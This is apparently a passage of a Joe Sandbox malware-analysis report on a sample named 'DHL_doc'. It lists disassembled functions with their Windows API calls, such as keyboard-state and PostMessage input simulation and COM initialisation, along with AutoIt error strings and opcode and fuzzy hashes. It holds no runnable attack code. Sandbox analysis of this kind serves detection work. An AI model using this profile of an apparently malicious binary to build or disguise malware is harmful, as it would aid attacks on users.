Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: e0a6b70510baf988c465caed899c379ea32bf55cce6147f08306a8c17be8eaca
Instruction ID: 936b91ccaf35c9d4602fec098aec2f5fd39596afde07a27a206862437e0c56a1
Opcode Fuzzy Hash: e0a6b70510baf988c465caed899c379ea32bf55cce6147f08306a8c17be8eaca
Instruction Fuzzy Hash: 21110B32A8931ABAA7006754AC82DDE3BDCDF15734B10002AF504E62C1E7A49D4072E9

Function 00F2ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00F2ED2A
_wcslen.LIBCMT ref: 00F2ED3B
_wcslen.LIBCMT ref: 00F2ED79
_wcslen.LIBCMT ref: 00F2EDAF
_wcslen.LIBCMT ref: 00F2EDDF
_wcslen.LIBCMT ref: 00F2EDEF
_wcslen.LIBCMT ref: 00F2EE2B
_wcslen.LIBCMT ref: 00F2EE5A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 0c5dcc2ad7209e9639ec0a0bcc8b6148de3387e4b099a74f92b85c5bc0d059e0
Instruction ID: 8c3a7438b59d638c95716fe6a4cbc2fe3994ae028681ee5b73b7dc234073d2dd
Opcode Fuzzy Hash: 0c5dcc2ad7209e9639ec0a0bcc8b6148de3387e4b099a74f92b85c5bc0d059e0
Instruction Fuzzy Hash: FA41BF65C1026C65CB11EBF59C8A9CFB3ECAF49310F509462E618F3162EB34E245C3E6

Function 00EDF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F1682C,00000004,00000000,00000000), ref: 00EDF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F1682C,00000004,00000000,00000000), ref: 00F1F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F1682C,00000004,00000000,00000000), ref: 00F1F454

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: cd646d577ae8161a8d4d756d131a110fa62f93de4177ae70fefbcd06655c0684
Instruction ID: b578b17d53d3cd4253e452bda352140b3dfaa6078891f7b6289a7287993db93a
Opcode Fuzzy Hash: cd646d577ae8161a8d4d756d131a110fa62f93de4177ae70fefbcd06655c0684
Instruction Fuzzy Hash: E1414C31D04780BED739CB69C8A87AA7B91EBD5314F14603EE18B76760C631D8C6EB50

Function 00F52D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F52D1B
GetDC.USER32(00000000), ref: 00F52D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F52D2E
ReleaseDC.USER32(00000000,00000000), ref: 00F52D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F52D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F52D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F55A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00F52DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F52DE1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: d60949413e993f00663b27e1f78d4e1851d240856372902f03105e31d9b2ff90
Instruction ID: 8c1764f640b6298b98132117908ddb90c8e441e58090e1f93e5426b16c419dd5
Opcode Fuzzy Hash: d60949413e993f00663b27e1f78d4e1851d240856372902f03105e31d9b2ff90
Instruction Fuzzy Hash: 69316B72201314BFEB118F549C8AFEB3BA9EF0A726F044055FF099A291C6759C51DBA4

Function 00F25622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00F25637
_memcmp.LIBVCRUNTIME ref: 00F25659
_memcmp.LIBVCRUNTIME ref: 00F25671
_memcmp.LIBVCRUNTIME ref: 00F25684
_memcmp.LIBVCRUNTIME ref: 00F2569E
_memcmp.LIBVCRUNTIME ref: 00F256B1
_memcmp.LIBVCRUNTIME ref: 00F256C9
_memcmp.LIBVCRUNTIME ref: 00F256E4

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e46dc8f56bf797a6a0dc5bf0042fae35c6fa2e1e36b701ba44c713179912493e
Instruction ID: 6ea7a3db20dab77f87d296533a6ef27e335ab3f0daf71d7f9a5b33e42f8a62e5
Opcode Fuzzy Hash: e46dc8f56bf797a6a0dc5bf0042fae35c6fa2e1e36b701ba44c713179912493e
Instruction Fuzzy Hash: 00210B72F41A6D77D2149521AE82FFB379CAF20B95F440070FE05AA581F730EE18A1A6

Function 00F44FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00F4502E, 00F45383
Not an Object type, xrefs: 00F45007

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: dfdb2280f655f4050dabd7ed55615167c9c906db24a2e0eefba5a94fd31e58a2
Instruction ID: 5a2ec8c6372f4b174e900aa27dbc08fbb46eb8a131bbd60a023abadb29bea1f3
Opcode Fuzzy Hash: dfdb2280f655f4050dabd7ed55615167c9c906db24a2e0eefba5a94fd31e58a2
Instruction Fuzzy Hash: 8ED1C275E0060AAFDF10DF98C880BAEBBB5BF48754F148069ED15AB282D770DD45DB90

Function 00F01522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00F015CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F01651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F016E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F016FB

Part of subcall function 00EF3820: RtlAllocateHeap.NTDLL(00000000,?,00F91444,?,00EDFDF5,?,?,00ECA976,00000010,00F91440,00EC13FC,?,00EC13C6,?,00EC1129), ref: 00EF3852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F01777
__freea.LIBCMT ref: 00F017A2
__freea.LIBCMT ref: 00F017AE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: b05f5f67271dfc47606cf8c01b4345b6adbc951eb8aacf7d696321538f6f2d30
Instruction ID: a2049921a373f87115e69f2e9862aec800f7478131345ef18b5c178237d26655
Opcode Fuzzy Hash: b05f5f67271dfc47606cf8c01b4345b6adbc951eb8aacf7d696321538f6f2d30
Instruction Fuzzy Hash: 73918272E0021A9EDB208F64CC81AFEBBB5BF49720F584659E905EB1C1D725DD44FBA0

Function 00F44523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F44648
VariantInit.OLEAUT32(?), ref: 00F44749
VariantClear.OLEAUT32(?), ref: 00F44753
VariantClear.OLEAUT32(?), ref: 00F447B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00F4472C
Null Object assignment in FOR..IN loop, xrefs: 00F445D8, 00F44706, 00F447BE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: bd2806b39ba4d82f4407d1c8908719196fe51d56b5ee44bfc5ca29a5cf7cadaf
Instruction ID: e3a31d92193bab2395a21e5bc8356e7bcbfef059e9e5415deb002650f5ae71d5
Opcode Fuzzy Hash: bd2806b39ba4d82f4407d1c8908719196fe51d56b5ee44bfc5ca29a5cf7cadaf
Instruction Fuzzy Hash: 1C919271E00219ABDF20DFA4C844FAEBBB8EF46724F108559F915BB280D770A941DFA0

Function 00F31187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F3125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F31284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F312A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F312D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F3135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F313C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F31430

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 47ff8d511e97b6251a464e59467cd1d3bcaf71137c627baee63ffcb46ac65ded
Instruction ID: 6e32b03f1b0ac405aa27503a81e2cfa10ebdd5abe6d769638a293f39968945f8
Opcode Fuzzy Hash: 47ff8d511e97b6251a464e59467cd1d3bcaf71137c627baee63ffcb46ac65ded
Instruction Fuzzy Hash: CD91BE72A002089FDB00DF94C885BBEB7B5FF45335F104129E911EB291DB79E942EBA0

Function 00ED948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ed36f1b87e24aeb5e4b3bf32176b836500ad5b0033c114a59acd081200cd37af
Instruction ID: f780d64a7b1a185c03eb9f7a0c3d16e1a1339510303d016aa21fad8625f465b8
Opcode Fuzzy Hash: ed36f1b87e24aeb5e4b3bf32176b836500ad5b0033c114a59acd081200cd37af
Instruction Fuzzy Hash: 0F913871D00219EFCB10CFA9CC84AEEBBB8FF49320F145556E515B7292D375AA42DBA0

Function 00F43947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F4396B
CharUpperBuffW.USER32(?,?), ref: 00F43A7A
_wcslen.LIBCMT ref: 00F43A8A
VariantClear.OLEAUT32(?), ref: 00F43C1F

Part of subcall function 00F30CDF: VariantInit.OLEAUT32(00000000), ref: 00F30D1F
Part of subcall function 00F30CDF: VariantCopy.OLEAUT32(?,?), ref: 00F30D28
Part of subcall function 00F30CDF: VariantClear.OLEAUT32(?), ref: 00F30D34

Strings

Incorrect Parameter format, xrefs: 00F439A6, 00F43BA1
AUTOIT.ERROR, xrefs: 00F43A80, 00F43A85

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 1fddf13d2259f551347d1ab9a327fe7bb87ae23b077bd1f1a21c3e31152def37
Instruction ID: 0ee4e9531b93e9161dc4677daa8ca6b5cf87d4c0a4499a65de2c1f1a1d33aa66
Opcode Fuzzy Hash: 1fddf13d2259f551347d1ab9a327fe7bb87ae23b077bd1f1a21c3e31152def37
Instruction Fuzzy Hash: E1918B75A083059FC704EF24C580A6ABBE5FF88314F14892DF88A97351DB35EE06DB92

Function 00F44BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00F2000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?,?,00F2035E), ref: 00F2002B
Part of subcall function 00F2000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?), ref: 00F20046
Part of subcall function 00F2000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?), ref: 00F20054
Part of subcall function 00F2000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?), ref: 00F20064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F44C51
_wcslen.LIBCMT ref: 00F44D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F44DCF
CoTaskMemFree.OLE32(?), ref: 00F44DDA

Strings

NULL Pointer assignment, xrefs: 00F44E23, 00F44E52

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 00e8daac412edac550c0db312d5075565d38b18678e1ce8bd5547586d26cc31e
Instruction ID: 61549c040663b65880399ec3cf2181e8bb91a331778f50ac20cc801a77b2dcac
Opcode Fuzzy Hash: 00e8daac412edac550c0db312d5075565d38b18678e1ce8bd5547586d26cc31e
Instruction Fuzzy Hash: 11912672D0021DAFDF14DFA4D891EEEBBB8BF08314F104169E915B7291DB34AA459FA0

Function 00F520FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00F52183
GetMenuItemCount.USER32(00000000), ref: 00F521B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F521DD
_wcslen.LIBCMT ref: 00F52213
GetMenuItemID.USER32(?,?), ref: 00F5224D
GetSubMenu.USER32(?,?), ref: 00F5225B

Part of subcall function 00F23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F23A57
Part of subcall function 00F23A3D: GetCurrentThreadId.KERNEL32 ref: 00F23A5E
Part of subcall function 00F23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F225B3), ref: 00F23A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F522E3

Part of subcall function 00F2E97B: Sleep.KERNEL32 ref: 00F2E9F3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: c1a45d6d269c5a4a4e022b5f678f1314bff916546eb69c78411c21ea6c804efe
Instruction ID: be0e3abfc1cbc80f12b21c50112f34bac212f6f42d118ce3ce37dc2c93bf8ccb
Opcode Fuzzy Hash: c1a45d6d269c5a4a4e022b5f678f1314bff916546eb69c78411c21ea6c804efe
Instruction Fuzzy Hash: 53719E75E00205AFCB50DF64C881AAEB7F1EF49321F148559EA16FB341DB34EE429B90

Function 00F57E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(018C8D80), ref: 00F57F37
IsWindowEnabled.USER32(018C8D80), ref: 00F57F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F5801E
SendMessageW.USER32(018C8D80,000000B0,?,?), ref: 00F58051
IsDlgButtonChecked.USER32(?,?), ref: 00F58089
GetWindowLongW.USER32(018C8D80,000000EC), ref: 00F580AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F580C3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3703f6863898d4bc22dae4b568c957688e1802ab4357666e3e05d28616d907ea
Instruction ID: 5522dd0910f612c629a3ef819f90ccca08e0c11ed389d11f1bac5324969b4b35
Opcode Fuzzy Hash: 3703f6863898d4bc22dae4b568c957688e1802ab4357666e3e05d28616d907ea
Instruction Fuzzy Hash: 5371B134A08344AFEB21EF54DC84FAA7BF5EF09352F140459EE55572A1CB31A849EB90

Function 00F2AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00F2AEF9
GetKeyboardState.USER32(?), ref: 00F2AF0E
SetKeyboardState.USER32(?), ref: 00F2AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00F2AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 00F2AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 00F2AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F2B020

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 81ad68bde4f5deb35398c02af42031778139e230e27711703564149944ad0fa3
Instruction ID: 7b5ea0d69f3bcf292433a91e757f653a65d486d0206b7fa33e8aa4a2d940cf53
Opcode Fuzzy Hash: 81ad68bde4f5deb35398c02af42031778139e230e27711703564149944ad0fa3
Instruction Fuzzy Hash: 2551D3A0A047E53EFB3782349D45BBABFE95B06314F088489E6E9558C2D3D8ACC4E751

Function 00F2ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00F2AD19
GetKeyboardState.USER32(?), ref: 00F2AD2E
SetKeyboardState.USER32(?), ref: 00F2AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F2ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F2ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F2AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F2AE38

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bcc881d3c7deca10748a4caa985645b235eec2a7fd0009cceecf57f2c9d1a45e
Instruction ID: 980e6c9591cfcb0f5a2c8dd72188e011b06ab7ac49a0ea19f71a56149dc559ba
Opcode Fuzzy Hash: bcc881d3c7deca10748a4caa985645b235eec2a7fd0009cceecf57f2c9d1a45e
Instruction Fuzzy Hash: 9C51E5A1904BE53EFB3383359C55B7ABEA85B46310F088488E1D9568C3D294EC99F752

Function 00EF542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00F03CD6,?,?,?,?,?,?,?,?,00EF5BA3,?,?,00F03CD6,?,?), ref: 00EF5470
__fassign.LIBCMT ref: 00EF54EB
